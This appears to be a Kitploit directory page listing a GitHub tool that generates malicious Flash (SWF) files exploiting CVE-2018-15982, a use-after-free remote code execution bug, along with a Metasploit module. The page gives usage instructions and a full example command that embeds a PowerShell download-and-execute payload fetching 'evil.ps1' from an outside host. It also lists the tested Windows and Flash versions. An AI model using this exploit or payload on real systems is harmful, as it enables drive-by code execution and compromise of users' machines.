Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
adobe-flash-cve2018-15982 — Script and metasploit module for CVE-2018-15982 | Kitploit
Tools/GitHubGitHub/kphongagsorn/adobe-flash-cve2018-15982
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationWeb Application Exploitation
GitHubkphongagsorn/adobe-flash-cve2018-15982

adobe-flash-cve2018-15982

Script and metasploit module for CVE-2018-15982

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
1156 years agoNot yet reviewed

Adobe Flash CVE-2018-15982

This script creates a swf payload for CVE-2018-15982, which is based off of the PoC from https://github.com/smgorelik/Windows-RCE-exploits. The vulnerability was discovered by Chenming Xu and Ed Miles of Gigamon ATR.

The vulnerability is a use-after-free flaw enabling arbitrary code-execution in Flash. More information can be found in the links below.

  • https://threatpost.com/adobe-patches-zero-day-vulnerability-in-flash-player/139629/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-15982

Note: Currently only spraying one block, I noticed this after I created the script.

Usage:

python create_swf.py <command> <output file name>

Example Usage:

python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf

Tested on:

  • Windows 10 Enterprise 10.0.17134, Internet Explorer 11.285.17134.0
  • Adobe Flash 31.0.0.153, 29.0.0.140

Example

Create payload:

alt text

Executing payload:

alt text

Confirm execution:

alt text

Metasploit Module

alt text

Download Tool